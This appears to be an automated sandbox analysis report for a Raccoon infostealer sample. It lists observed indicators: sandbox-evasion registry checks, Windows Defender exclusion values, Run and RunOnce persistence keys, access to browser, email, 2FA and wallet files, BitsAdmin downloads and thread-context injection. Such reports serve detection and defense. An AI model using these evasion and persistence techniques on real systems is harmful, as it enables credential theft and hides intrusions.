raccoon | b244fb7a7b39c836a9629262eaa80865cfbaf37aaea1b1d4b880d8a864f865a4

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7ZI0ROMveurFDV8Aq7DVyS06.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ARSOO0DIp2UugIvuwrSyM9oD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ARSOO0DIp2UugIvuwrSyM9oD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7ZI0ROMveurFDV8Aq7DVyS06.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	jingzhang.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Xegysukinae.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Bugyponoku.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Fikumigaena.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Tuvuduloxa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	arnatic_3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	arnatic_6.exe

Loads dropped DLL 64 IoCs

pid	Process
3672	setup_install.exe
3672	setup_install.exe
3672	setup_install.exe
3672	setup_install.exe
3672	setup_install.exe
3172	rUNdlL32.eXe
1252	arnatic_2.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
8	chrome.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
5480	MrGh6bEH0L0a.exe
4192	xe3VggU3QswqnlgTx1tHoeRE.exe
4192	xe3VggU3QswqnlgTx1tHoeRE.exe
5788	rUNdlL32.eXe
6044	rundll32.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
3936	25D.exe
3936	25D.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
5844	4590.exe
5292	3745.exe
5292	3745.exe
5292	3745.exe
5292	3745.exe
5292	3745.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
6656	DFFC.exe
6656	DFFC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
5308	rundll32.exe
6988	rundll32.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral24/files/0x000200000001abc6-313.dat	themida
behavioral24/files/0x000200000001abc6-312.dat	themida
behavioral24/files/0x000200000001abd2-325.dat	themida
behavioral24/files/0x000200000001abd2-324.dat	themida

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QRIvBFx = "0"	rundll32.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1100866.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xaecylolunae.exe\""	èeèrgegdè_éçè_)))_.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Tesaetonaexa.exe\""	_____________bob.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Pefefariny.exe\""	12(((((.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Daewixaeruli.exe\""	Conhost.exe

Checks for any installed AV software in registry 1 TTPs 5 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	Conhost.exe
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7ZI0ROMveurFDV8Aq7DVyS06.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Browzar.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md8_8eus.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	note8876.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ARSOO0DIp2UugIvuwrSyM9oD.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 24 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1167	ipinfo.io
56	ipinfo.io
453	ipinfo.io
523	ip-api.com
1103	checkip.dyndns.org
1105	ipinfo.io
1162	ipinfo.io
1165	checkip.dyndns.org
12	ip-api.com
456	ipinfo.io
619	ipinfo.io
626	ipinfo.io
1110	ipinfo.io
624	ipinfo.io
625	ipinfo.io
1114	ipinfo.io
1161	ipinfo.io
1204	ipinfo.io
1212	ipinfo.io
57	ipinfo.io
145	checkip.amazonaws.com
547	checkip.amazonaws.com
1097	ipinfo.io
1098	ipinfo.io

Drops file in System32 directory 32 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent E2C9EB35A2E84C34	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\QRIvBFx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent DF0B9C39A7969DE8	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Videocard Service	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Conhost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Conhost.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Conhost.exe
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Conhost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 50E0C83ED140FE88	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1128	cjG0Iam1Jj0cNNTd_SEVIp5b.exe
2144	ARSOO0DIp2UugIvuwrSyM9oD.exe
4140	7ZI0ROMveurFDV8Aq7DVyS06.exe
4792	iaK6LGtP0xsu467Y5J6nvafj.exe

Suspicious use of SetThreadContext 17 IoCs

description	pid	Process	procid_target
PID 3804 set thread context of 208	3804	arnatic_7.exe	93
PID 3900 set thread context of 3872	3900	svchost.exe	96
PID 4304 set thread context of 4636	4304	xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe	124
PID 4744 set thread context of 4960	4744	n_XvoC0lA5U4xLfvwMUQ9ivc.exe	125
PID 2088 set thread context of 4100	2088	1YsRDMFL5gbGtNm7s1bVicwX.exe	126
PID 4572 set thread context of 5004	4572	qeWffXXPdL7IgtmXJGM3uvPh.exe	134
PID 2060 set thread context of 4224	2060	DHL4Bb1YNR_LuTP87OTPpPEl.exe	140
PID 4928 set thread context of 5480	4928	_eaNdnN9tnNRXIFKGG2yF0fp.exe	178
PID 412 set thread context of 5480	412	MrGh6bEH0L0a.exe	178
PID 6576 set thread context of 3696	6576	cmd.exe	357
PID 8276 set thread context of 8268	8276	compattelrunner.exe	499
PID 8900 set thread context of 8356	8900	jdrbfsf	520
PID 8832 set thread context of 3280	8832	toolspab1.exe	526
PID 8764 set thread context of 7128	8764	toolspab1.exe	524
PID 5084 set thread context of 6464	5084	jfiag3g_gg.exe	662
PID 3696 set thread context of 7244	3696	svchost.exe	789
PID 8800 set thread context of 5080	8800	wirbfsf	829

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\bundle-app.js	LibraVPN.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\log_out.png	LibraVPN.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\64\openvpn\is-CNSEQ.tmp	libravpn_setup.tmp
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\is-A8Q5H.tmp	libravpn_setup.tmp
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\on_btn.png	LibraVPN.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\my.png	LibraVPN.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\64\openvpn\is-BHG86.tmp	libravpn_setup.tmp
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\bw.png	LibraVPN.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\dk.png	LibraVPN.exe
File opened for modification	C:\Program Files\temp_files\bckf.fon	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
File opened for modification	C:\Program Files (x86)\QRIvBFx	powershell.exe
File created	C:\Program Files (x86)\Reference Assemblies\Pefefariny.exe	12(((((.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\small-star-icon.png	LibraVPN.exe
File opened for modification	C:\Program Files\temp_files\QRIvBFx.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\se.png	LibraVPN.exe
File created	C:\Program Files\temp_files\QRIvBFx.dll	data_load.exe
File created	C:\Program Files\temp_files\cache.dat	data_load.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\temp_files	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
File created	C:\Program Files\Common Files\KLOTBEAUID\prolab.exe.config	12(((((.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\account.png	LibraVPN.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceGrid2.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-DRRC3.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\QRIvBFx\cache.dat	powershell.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	Process not Found
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
2184	5092	WerFault.exe	127
4364	5092	WerFault.exe	127
4104	5092	WerFault.exe	127
4752	5092	WerFault.exe	127
5612	5092	WerFault.exe	127
5804	5092	WerFault.exe	127
6236	3876	WerFault.exe	149
6916	5072	WerFault.exe	132
6028	4952	WerFault.exe	358
5440	5644	WerFault.exe	395
5220	9204	WerFault.exe	556
6528	6796	WerFault.exe	529
9088	4984	WerFault.exe	742
6732	3928	WerFault.exe	809

Checks SCSI registry key(s) 3 TTPs 33 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4590.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MrGh6bEH0L0a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MrGh6bEH0L0a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MrGh6bEH0L0a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4590.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4590.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	xe3VggU3QswqnlgTx1tHoeRE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	xe3VggU3QswqnlgTx1tHoeRE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	25D.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	25D.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DFFC.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	arnatic_1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	arnatic_1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	DFFC.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6684	schtasks.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
1236	timeout.exe
7108	timeout.exe
5268	timeout.exe
580	timeout.exe
8624	timeout.exe

Download via BitsAdmin 1 TTPs 5 IoCs

dropper

BITS Jobs

T1197

pid	Process
5612	bitsadmin.exe
7856	bitsadmin.exe
7380	bitsadmin.exe
3936	bitsadmin.exe
4728	bitsadmin.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
